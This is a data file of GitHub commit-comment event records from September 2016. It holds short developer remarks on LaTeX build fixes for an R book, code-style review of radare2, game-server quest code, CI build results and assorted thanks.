{"id":"4611782469","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155738,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:24:54Z","updated_at":"2016-09-24T02:24:54Z","body":"It's not the backtick that's the problem, I think it's the underscore... Stupid latex. "}},"created_at":"2016-09-24T02:24:54Z"}
{"id":"4611782580","type":"CommitCommentEvent","actor":{"login":"AlexOuyang"},"repo":{"name":"CalVR/woundvac_unity"},"payload":{"comment":{"id":19155739,"position":null,"line":null,"path":null,"commit_id":"7750f337f6334aecc1c2261cbfca114b1af205c4","created_at":"2016-09-24T02:24:59Z","updated_at":"2016-09-24T02:24:59Z","body":"By building an HoloLens App, We are adding UWP (Universal Windows Platforms) support"}},"created_at":"2016-09-24T02:24:59Z"}
{"id":"4611786366","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/SIF_Win32"},"payload":{"comment":{"id":19155754,"position":null,"line":null,"path":null,"commit_id":"a700b8d237d8416bd31e759d0ca3155cffb9b081","created_at":"2016-09-24T02:28:00Z","updated_at":"2016-09-24T02:28:00Z","body":"How to have a official client with XMS disabled? (Connect to private server from mobile phone)"}},"created_at":"2016-09-24T02:28:00Z"}
{"id":"4611787204","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19155758,"position":5,"line":539,"path":"bin/install-slashsite","commit_id":"2a8ae063294ed6769b5701a071d895c8759638db","created_at":"2016-09-24T02:28:36Z","updated_at":"2016-09-24T02:28:36Z","body":"If we don't add a server domain for the site in, then the request for that new site won't be handled properly by apache properly. This might need additional work for multi-site install."}},"created_at":"2016-09-24T02:28:36Z"}
{"id":"4611788011","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19155760,"position":null,"line":null,"path":null,"commit_id":"c152a5e6547ab0b46d79b3cf47ec5877ce834597","created_at":"2016-09-24T02:29:13Z","updated_at":"2016-09-24T02:29:13Z","body":"Nice find, probably a copy-paste error in commit https://github.com/TrinityCore/TrinityCore/commit/95f3717151d8a5ee924e2b9ca5c673cffb4c7984 to sql/updates/world/2015_03_26_02_world.sql (https://github.com/TrinityCore/TrinityCore/blob/3.3.5/sql/old/3.3.5a/world/58_2015_03_21/2015_03_26_02_world.sql) - TDB 335.59 - 2015/07/14\r\n```\r\nentry  groupid      id  text                                                                                                                                                                                                                       type  language  probability   emote  duration   sound  BroadcastTextId  TextRange  comment                                   \r\n-----  -------  ------  -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  ------  --------  -----------  ------  --------  ------  ---------------  ---------  ------------------------------------------\r\n16819        1       0  The feast of corruption is no more! Magtheridon has fallen to the battle prowess of $n and $g his:her; allies! Witness the might of the Alliance! A pit lord commander is destroyed!                                         14         7          100      22         0       0            20754          2  Force Commander Danath Trollbane to Player\r\n16819        2       0  Hear me brothers and sisters-in-arms! The time of our enemies is at an end! We must strike at the fel orcs that remain! Exterminate them like the vermin that they are! Carry with you the favor of the Sons of Lothar!      14         7          100      22         0       0            20754          2  Force Commander Danath Trollbane to Player\r\n```"}},"created_at":"2016-09-24T02:29:13Z"}
{"id":"4611791536","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19155770,"position":null,"line":null,"path":null,"commit_id":"c8dba2581cb449eb6d87968df0edd7f9b62d12eb","created_at":"2016-09-24T02:31:54Z","updated_at":"2016-09-24T02:31:54Z","body":"Was this to go to staging on purpose? will you backport to 16.09?"}},"created_at":"2016-09-24T02:31:54Z"}
{"id":"4611792148","type":"CommitCommentEvent","actor":{"login":"simi"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19155773,"position":null,"line":null,"path":null,"commit_id":"0cc169d1de0decb3fae626a4b30297b7f4792745","created_at":"2016-09-24T02:32:24Z","updated_at":"2016-09-24T02:32:24Z","body":"fid :trollface:"}},"created_at":"2016-09-24T02:32:24Z"}
{"id":"4611792972","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155778,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:33:07Z","updated_at":"2016-09-24T02:33:07Z","body":"You are right. It is the underscore. Well, we cannot blame LaTeX in this case, although the error message is totally confusing (missing $?).\r\n\r\nThis issue is a little tricky to solve. The problem is that Markdown inside LaTeX is not supported. `` \\caption{`geom_point`} `` should have been `\\caption{\\texttt{geom\\_point}}`. I'll think more about how to solve this issue."}},"created_at":"2016-09-24T02:33:07Z"}
{"id":"4611795258","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155783,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:35:03Z","updated_at":"2016-09-24T02:35:03Z","body":"I just changed the caption to not include that word :)\r\n\r\nIt's working now on travis, although I was having problems locally rendering to pdf with the shiny app chunk evaluating, so I change that chunk to `eval = FALSE`. I'm trying a travis build right now with that chunk back in. "}},"created_at":"2016-09-24T02:35:03Z"}
{"id":"4611797044","type":"CommitCommentEvent","actor":{"login":"18praveenb"},"repo":{"name":"HarkerGameDevelopmentClub/Tutorial-Project"},"payload":{"comment":{"id":19155788,"position":null,"line":null,"path":null,"commit_id":"7860fba6173ed8b42a97645b2359489badb4a08c","created_at":"2016-09-24T02:36:24Z","updated_at":"2016-09-24T02:36:24Z","body":"calm down, what matters is that we fixed the merge conflict.\r\nand the commit worked in the end."}},"created_at":"2016-09-24T02:36:24Z"}
{"id":"4611798041","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155792,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:37:10Z","updated_at":"2016-09-24T02:37:10Z","body":"> Well, we cannot blame LaTeX in this case\r\n\r\nAnd yet, logical or not, I 100% do. This is why I love R Markdown."}},"created_at":"2016-09-24T02:37:10Z"}
{"id":"4611799087","type":"CommitCommentEvent","actor":{"login":"feross"},"repo":{"name":"feross/webtorrent-desktop"},"payload":{"comment":{"id":19155805,"position":null,"line":null,"path":null,"commit_id":"24fe033e2fb8c210e8e7a418ff6d847be314bbe8","created_at":"2016-09-24T02:38:09Z","updated_at":"2016-09-24T02:38:09Z","body":"👍 "}},"created_at":"2016-09-24T02:38:09Z"}
{"id":"4611801971","type":"CommitCommentEvent","actor":{"login":"nagireddygit"},"repo":{"name":"nagireddygit/Dev"},"payload":{"comment":{"id":19155819,"position":null,"line":null,"path":null,"commit_id":"0e2fa407841e5e62cd73aac211f2f4dffa541ea1","created_at":"2016-09-24T02:40:25Z","updated_at":"2016-09-24T02:40:25Z","body":"commited create file"}},"created_at":"2016-09-24T02:40:25Z"}
{"id":"4611805006","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155833,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:42:55Z","updated_at":"2016-09-24T02:42:55Z","body":"Okay, everything seems to be working except that the download button doesn't show up. But I think that's a problem with where I had `download: [pdf]` in the yaml. "}},"created_at":"2016-09-24T02:42:55Z"}
{"id":"4611806665","type":"CommitCommentEvent","actor":{"login":"kivikakk"},"repo":{"name":"kivikakk/ifsexplorer"},"payload":{"comment":{"id":19155842,"position":null,"line":null,"path":null,"commit_id":"f1095ad2c73d2ebc7ffcf64933bf7d5b5e6106a5","created_at":"2016-09-24T02:44:16Z","updated_at":"2016-09-24T02:44:16Z","body":"@Santikun: good point! I had removed and re-added the project from my GitHub, so the release disappeared. I'll recreate it and let you know. :)"}},"created_at":"2016-09-24T02:44:16Z"}
{"id":"4611807039","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155843,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:44:33Z","updated_at":"2016-09-24T02:44:33Z","body":"Yes, that is one way. The other is to switch the order of building gitbook and pdf, i.e. build PDF first, then gitbook. Otherwise gitbook does not know there exists a PDF."}},"created_at":"2016-09-24T02:44:33Z"}
{"id":"4611808394","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155847,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:45:41Z","updated_at":"2016-09-24T02:45:41Z","body":"This is in _build.sh, just change the order of the two `render_book` calls? Awesome, I'll try that if this doesn't work. "}},"created_at":"2016-09-24T02:45:41Z"}
{"id":"4611810095","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155851,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:47:01Z","updated_at":"2016-09-24T02:47:01Z","body":"Yes."}},"created_at":"2016-09-24T02:47:01Z"}
{"id":"4611811560","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155857,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:48:13Z","updated_at":"2016-09-24T02:48:13Z","body":"Got it! Changing in the YAML did the trick! (Although I also just committed with a change in the order of the build, too.) Thank you SO much!!"}},"created_at":"2016-09-24T02:48:13Z"}
{"id":"4611816768","type":"CommitCommentEvent","actor":{"login":"kivikakk"},"repo":{"name":"kivikakk/ifsexplorer"},"payload":{"comment":{"id":19155880,"position":null,"line":null,"path":null,"commit_id":"f1095ad2c73d2ebc7ffcf64933bf7d5b5e6106a5","created_at":"2016-09-24T02:52:29Z","updated_at":"2016-09-24T02:52:29Z","body":"@Santikun: here you go: enjoy! https://github.com/kivikakk/ifsexplorer/releases/tag/v1.0"}},"created_at":"2016-09-24T02:52:29Z"}
{"id":"4611816857","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19155882,"position":null,"line":null,"path":null,"commit_id":"0cc3b6108ef7be42175c9c2544629fc928b3bdac","created_at":"2016-09-24T02:52:33Z","updated_at":"2016-09-24T02:52:33Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2299 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.11%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T02:52:33Z"}
{"id":"4611818645","type":"CommitCommentEvent","actor":{"login":"JPZY"},"repo":{"name":"JPZY/test"},"payload":{"comment":{"id":19155891,"position":null,"line":null,"path":null,"commit_id":"2daf1771ade8bca1fced3a6a83e385d9fc6be239","created_at":"2016-09-24T02:54:04Z","updated_at":"2016-09-24T02:54:04Z","body":"hello world"}},"created_at":"2016-09-24T02:54:04Z"}
{"id":"4611819391","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155895,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:54:39Z","updated_at":"2016-09-24T02:54:39Z","body":"You are welcome. I'll try to fix the figure caption issue since other people are likely to run into it as well."}},"created_at":"2016-09-24T02:54:39Z"}
{"id":"4611823617","type":"CommitCommentEvent","actor":{"login":"HenryQuan"},"repo":{"name":"HenryQuan/WOWS-Training-Room"},"payload":{"comment":{"id":19155910,"position":null,"line":null,"path":null,"commit_id":"7557dbd4ee1f0daa99955c21bcb5d8d411cac740","created_at":"2016-09-24T02:57:57Z","updated_at":"2016-09-24T02:57:57Z","body":"Images are huge compared to codes."}},"created_at":"2016-09-24T02:57:57Z"}
{"id":"4611824698","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19155918,"position":null,"line":null,"path":null,"commit_id":"0cc3b6108ef7be42175c9c2544629fc928b3bdac","created_at":"2016-09-24T02:58:42Z","updated_at":"2016-09-24T02:58:42Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-24T02:58:42Z"}
{"id":"4613091153","type":"CommitCommentEvent","actor":{"login":"thezoggy"},"repo":{"name":"Safihre/sabnzbd-yenc"},"payload":{"comment":{"id":19160081,"position":null,"line":null,"path":null,"commit_id":"24da3863c7e1f553c473d7f83511f7904246c329","created_at":"2016-09-24T20:00:11Z","updated_at":"2016-09-24T20:00:11Z","body":"just fyi, the yenc 0.4 I use is the one that has the win32 hacks (which is needed for compiling).\r\n\r\nhere is the fork's diff from the normal 0.4:\r\nhttps://bitbucket.org/kriswebdev/python-yenc-win32-and-still-unix/branches/compare/kriswebdev/python-yenc-win32-and-still-unix:tip%0Ddual75/yenc:default#diff\r\n"}},"created_at":"2016-09-24T20:00:11Z"}
{"id":"4613093473","type":"CommitCommentEvent","actor":{"login":"rkorchinski"},"repo":{"name":"rkorchinski/test_repository"},"payload":{"comment":{"id":19160091,"position":null,"line":null,"path":null,"commit_id":"82838dc91992e2b8ff2110e23eb06866b94c188a","created_at":"2016-09-24T20:01:42Z","updated_at":"2016-09-24T20:01:42Z","body":"# Wow !    This is awesome !\r\n--------------------------------------------"}},"created_at":"2016-09-24T20:01:42Z"}
{"id":"4613096419","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19160110,"position":18,"line":38,"path":"gruntfile.js","commit_id":"747d607d9fed3fd62fd9b2e1c48459d523352db6","created_at":"2016-09-24T20:03:53Z","updated_at":"2016-09-24T20:03:53Z","body":"Takie są dostępne\r\n`http://gruntjs.com/configuring-tasks#globbing-patterns`"}},"created_at":"2016-09-24T20:03:53Z"}
{"id":"4613096965","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19160113,"position":18,"line":38,"path":"gruntfile.js","commit_id":"747d607d9fed3fd62fd9b2e1c48459d523352db6","created_at":"2016-09-24T20:04:19Z","updated_at":"2016-09-24T20:04:19Z","body":"To na co wskażesz zależy od struktury folderów, dlatego nie ma jakichś konkretnych wytycznych"}},"created_at":"2016-09-24T20:04:19Z"}
{"id":"4613097939","type":"CommitCommentEvent","actor":{"login":"alphaleonis"},"repo":{"name":"alphaleonis/AlphaFS"},"payload":{"comment":{"id":19160115,"position":null,"line":null,"path":null,"commit_id":"30865b48e8748ddc28e2208659423271230c1699","created_at":"2016-09-24T20:05:04Z","updated_at":"2016-09-24T20:05:04Z","body":"Uhm, why are we committing binaries to the repository?"}},"created_at":"2016-09-24T20:05:04Z"}
{"id":"4613098362","type":"CommitCommentEvent","actor":{"login":"deadsurgeon42"},"repo":{"name":"deadsurgeon42/aurora-hubot"},"payload":{"comment":{"id":19160117,"position":null,"line":null,"path":null,"commit_id":"6a7f796f152bdf7469b66ff1334c43ea1fde702a","created_at":"2016-09-24T20:05:19Z","updated_at":"2016-09-24T20:05:19Z","body":"Thanks maka :heart:"}},"created_at":"2016-09-24T20:05:19Z"}
{"id":"4613100047","type":"CommitCommentEvent","actor":{"login":"ProfessorXZ"},"repo":{"name":"deadsurgeon42/aurora-hubot"},"payload":{"comment":{"id":19160126,"position":null,"line":null,"path":null,"commit_id":"6a7f796f152bdf7469b66ff1334c43ea1fde702a","created_at":"2016-09-24T20:06:31Z","updated_at":"2016-09-24T20:06:31Z","body":"Prepare to get yourself sued."}},"created_at":"2016-09-24T20:06:31Z"}
{"id":"4613101862","type":"CommitCommentEvent","actor":{"login":"nicatronTg"},"repo":{"name":"deadsurgeon42/aurora-hubot"},"payload":{"comment":{"id":19160134,"position":null,"line":null,"path":null,"commit_id":"6a7f796f152bdf7469b66ff1334c43ea1fde702a","created_at":"2016-09-24T20:07:51Z","updated_at":"2016-09-24T20:07:51Z","body":"![maka_and_soul_lies](https://cloud.githubusercontent.com/assets/532647/18810940/45fc2c9e-8260-11e6-9c21-21011bd76af0.png)\r\n"}},"created_at":"2016-09-24T20:07:51Z"}
{"id":"4613105017","type":"CommitCommentEvent","actor":{"login":"lmr"},"repo":{"name":"ligurio/avocado"},"payload":{"comment":{"id":19160153,"position":null,"line":null,"path":null,"commit_id":"3a1d0acc7e944f2bddc8ba97cf8e16d0016229a4","created_at":"2016-09-24T20:10:07Z","updated_at":"2016-09-24T20:10:07Z","body":"Nice :)"}},"created_at":"2016-09-24T20:10:07Z"}
{"id":"4613106413","type":"CommitCommentEvent","actor":{"login":"thezoggy"},"repo":{"name":"Safihre/sabnzbd-yenc"},"payload":{"comment":{"id":19160160,"position":null,"line":null,"path":null,"commit_id":"24da3863c7e1f553c473d7f83511f7904246c329","created_at":"2016-09-24T20:11:04Z","updated_at":"2016-09-24T20:11:04Z","body":"also to note, there is this:\r\nhttps://bitbucket.org/Gfy/pyrescene/src/ae56c25520dca83e7d42fb39158a2c91be7eb708/usenet/yenc.py?at=default&fileviewer=file-view-default\r\n"}},"created_at":"2016-09-24T20:11:04Z"}
{"id":"4613107255","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160167,"position":12,"line":30,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:11:43Z","updated_at":"2016-09-24T20:11:43Z","body":"Unnecessary !=NULL"}},"created_at":"2016-09-24T20:11:43Z"}
{"id":"4613107311","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19160168,"position":null,"line":null,"path":null,"commit_id":"b7aa60bf540abc6500c3b469d58dc6eb7588be80","created_at":"2016-09-24T20:11:45Z","updated_at":"2016-09-24T20:11:45Z","body":"👍 "}},"created_at":"2016-09-24T20:11:45Z"}
{"id":"4613107592","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160171,"position":71,"line":269,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:11:57Z","updated_at":"2016-09-24T20:11:57Z","body":"Missing spaces around >="}},"created_at":"2016-09-24T20:11:57Z"}
{"id":"4613108100","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160172,"position":114,"line":281,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:12:19Z","updated_at":"2016-09-24T20:12:19Z","body":"No need to use temporal variables like this"}},"created_at":"2016-09-24T20:12:19Z"}
{"id":"4613108677","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160175,"position":19,"line":37,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:12:41Z","updated_at":"2016-09-24T20:12:41Z","body":"Missing spaces around = and <.."}},"created_at":"2016-09-24T20:12:41Z"}
{"id":"4613108863","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160176,"position":29,"line":47,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:12:48Z","updated_at":"2016-09-24T20:12:48Z","body":"Missing braces"}},"created_at":"2016-09-24T20:12:48Z"}
{"id":"4613109226","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160179,"position":25,"line":43,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:13:05Z","updated_at":"2016-09-24T20:13:05Z","body":"Use ut8"}},"created_at":"2016-09-24T20:13:05Z"}
{"id":"4613109408","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160181,"position":20,"line":38,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:13:12Z","updated_at":"2016-09-24T20:13:12Z","body":"Missing braces"}},"created_at":"2016-09-24T20:13:12Z"}
{"id":"4613109507","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19160182,"position":null,"line":null,"path":null,"commit_id":"120d8dce966f9342303ffd1c1b2555bb8c59f24f","created_at":"2016-09-24T20:13:16Z","updated_at":"2016-09-24T20:13:16Z","body":"Nice work!"}},"created_at":"2016-09-24T20:13:16Z"}
{"id":"4613110030","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160183,"position":25,"line":43,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:13:37Z","updated_at":"2016-09-24T20:13:37Z","body":"Missing spaces around +"}},"created_at":"2016-09-24T20:13:37Z"}
{"id":"4613110279","type":"CommitCommentEvent","actor":{"login":"Darcidride"},"repo":{"name":"MinetestForFun/server-minetestforfun"},"payload":{"comment":{"id":19160184,"position":null,"line":null,"path":null,"commit_id":"59c4c8e919183e9e45282b1ac0a8d74689f36f20","created_at":"2016-09-24T20:13:46Z","updated_at":"2016-09-24T20:13:46Z","body":"Yes, it can be easier to read/understand, but it's a good beginning for now, don't you think ?"}},"created_at":"2016-09-24T20:13:46Z"}
{"id":"4613110876","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160187,"position":20,"line":38,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:14:13Z","updated_at":"2016-09-24T20:14:13Z","body":"Theres rconsisbreaked too"}},"created_at":"2016-09-24T20:14:13Z"}
{"id":"4613111651","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zlowram/radare2"},"payload":{"comment":{"id":19160191,"position":9,"line":27,"path":"libr/core/cmd_zign.c","commit_id":"912cba1ef2d4b66a57e6002e3c4f5e816919d626","created_at":"2016-09-24T20:14:50Z","updated_at":"2016-09-24T20:14:50Z","body":"Missing spaces around -\r\n\r\nDefine and assign in the same line"}},"created_at":"2016-09-24T20:14:50Z"}
{"id":"4613112688","type":"CommitCommentEvent","actor":{"login":"creativeF1sh"},"repo":{"name":"uaandrei/d4232ffg"},"payload":{"comment":{"id":19160199,"position":null,"line":null,"path":null,"commit_id":"6e0a00a3f5cc0582e6cc790df70a9c342f9efabb","created_at":"2016-09-24T20:15:39Z","updated_at":"2016-09-24T20:15:39Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;0ub82Gp5&#x2F;10-search-activities-for-users\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Search activities for users</a>"}},"created_at":"2016-09-24T20:15:39Z"}
{"id":"4613113763","type":"CommitCommentEvent","actor":{"login":"vlad0209"},"repo":{"name":"EditionGuard/WooCommerce-Plugin"},"payload":{"comment":{"id":19160200,"position":null,"line":null,"path":null,"commit_id":"b3429c9a6d1921d39a8adaa15e2c8651826518aa","created_at":"2016-09-24T20:16:26Z","updated_at":"2016-09-24T20:16:26Z","body":"If quantity more than 1, should we generate link for each or one link for all?"}},"created_at":"2016-09-24T20:16:26Z"}
{"id":"4613116087","type":"CommitCommentEvent","actor":{"login":"Ummon"},"repo":{"name":"klacke/yaws"},"payload":{"comment":{"id":19160210,"position":null,"line":null,"path":null,"commit_id":"3364e06d56e9bc9261ec3b2e63b4323af4aaeac9","created_at":"2016-09-24T20:18:08Z","updated_at":"2016-09-24T20:18:08Z","body":"Thanks a lot, it works. Merci beaucoup!"}},"created_at":"2016-09-24T20:18:08Z"}
{"id":"4613116847","type":"CommitCommentEvent","actor":{"login":"kaadmy"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19160212,"position":null,"line":null,"path":null,"commit_id":"120d8dce966f9342303ffd1c1b2555bb8c59f24f","created_at":"2016-09-24T20:18:43Z","updated_at":"2016-09-24T20:18:43Z","body":"Thanks :)\r\nI'm working on adding quad/adren timers right now, and most of the stats(quad time, adren time) aren't exposed to the cgame hud :(\r\n"}},"created_at":"2016-09-24T20:18:43Z"}
{"id":"4613122034","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19160238,"position":null,"line":null,"path":null,"commit_id":"12fb3171436f0de111960a91154806b8cc6135ac","created_at":"2016-09-24T20:22:25Z","updated_at":"2016-09-24T20:22:25Z","body":"more spells have self cast! so it code will breaks some quests\r\ni rewrite to safe version (maybe needed further research):\r\n\r\n    uint32 spellId = pQuest->GetRewSpellCast();\r\n    if (!spellId)\r\n        spellId = pQuest->GetRewSpell();\r\n\r\n    if (spellId)\r\n    {\r\n        if (SpellEntry const* spellProto = sSpellStore.LookupEntry(spellId))\r\n        {\r\n            bool selfCast = true;\r\n\r\n            if (IsUnit(questGiver))\r\n            {\r\n                for (uint8 i = 0; i < MAX_EFFECT_INDEX; ++i)\r\n                {\r\n                    if (spellInfo->EffectImplicitTargetA[i] == TARGET_DUELVSPLAYER)\r\n                    {\r\n                        selfCast = false;\r\n                        break;\r\n                    }\r\n                }\r\n            }\r\n\r\n            if (selfCast)\r\n                this->CastSpell(this, spellId, true);\r\n            else\r\n                AsUnit(questGiver)->CastSpell(this, spellId, true);\r\n        }\r\n    }"}},"created_at":"2016-09-24T20:22:25Z"}
{"id":"4613124198","type":"CommitCommentEvent","actor":{"login":"emaccheese"},"repo":{"name":"bronces-de-uabc/SafeTrip"},"payload":{"comment":{"id":19160249,"position":null,"line":null,"path":null,"commit_id":"b385b88679b36db39844889d9965a1c28f116344","created_at":"2016-09-24T20:24:04Z","updated_at":"2016-09-24T20:24:04Z","body":"Se hara el merge"}},"created_at":"2016-09-24T20:24:04Z"}
{"id":"4613127607","type":"CommitCommentEvent","actor":{"login":"abettermap"},"repo":{"name":"CodeForFoco/bike-coop-theme"},"payload":{"comment":{"id":19160268,"position":null,"line":null,"path":null,"commit_id":"99782c4897de8059d09340a0982c7293fb59f7a1","created_at":"2016-09-24T20:26:27Z","updated_at":"2016-09-24T20:26:27Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Theme -- Header/Nav/Links](https://trello.com/c/IYMKL3mo/5-theme-header-nav-links)"}},"created_at":"2016-09-24T20:26:27Z"}
{"id":"4613130100","type":"CommitCommentEvent","actor":{"login":"MindFxck"},"repo":{"name":"MindFxck/packages_apps_Shuriken"},"payload":{"comment":{"id":19160276,"position":null,"line":null,"path":null,"commit_id":"5f8b155a544cb71e91c4ffd964b0c0f40cc5ea30","created_at":"2016-09-24T20:28:18Z","updated_at":"2016-09-24T20:28:18Z","body":"No need either. Going to work on either Swisher launcher or include a robust prebuilt one. "}},"created_at":"2016-09-24T20:28:18Z"}
{"id":"4613132276","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19160280,"position":null,"line":null,"path":null,"commit_id":"120d8dce966f9342303ffd1c1b2555bb8c59f24f","created_at":"2016-09-24T20:29:56Z","updated_at":"2016-09-24T20:29:56Z","body":"I made some adjustments to this, just to make the effect look a little more realistic, and also to introduce a couple functions to you. You'll notice I use VectorMA to scale and add one vector to another, and also AngleVectors to resolve the client's forward direction, and place the view infront of them as well as give it some forward velocity.\r\n\r\nI think this could still be tuned further, if you'd like to play around with it. `sv_max_clients 0`, `cg_third_person 1` and `cg_third_person_yaw 120` are your friends. Also, I think this function should be called in 1st person view as well. I see my own breath when its cold out :)"}},"created_at":"2016-09-24T20:29:56Z"}
